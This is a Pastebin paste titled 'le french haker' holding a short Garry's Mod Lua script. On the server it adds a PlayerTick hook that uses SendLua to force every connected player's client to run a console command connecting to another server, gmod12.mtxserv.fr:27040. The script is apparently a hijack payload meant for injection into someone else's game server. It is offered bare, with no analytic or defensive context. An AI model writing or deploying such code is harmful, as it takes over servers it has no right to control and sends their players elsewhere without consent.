Advertisement
lcast15

le french haker

May 12th, 2017
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. RunConsoleCommand('poufpouf')
  2. if SERVER then
  3.  
  4. local ip='gmod12.mtxserv.fr:27040'
  5.  
  6. hook.Add('PlayerTick','Redirect',function(ply)
  7. timer.Simple(2,function()
  8. ply:SendLua([[LocalPlayer():ConCommand('connect ]]..tostring(ip)..[[')]])
  9.  
  10.  
  11. end)
  12. end)
  13.  
  14. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement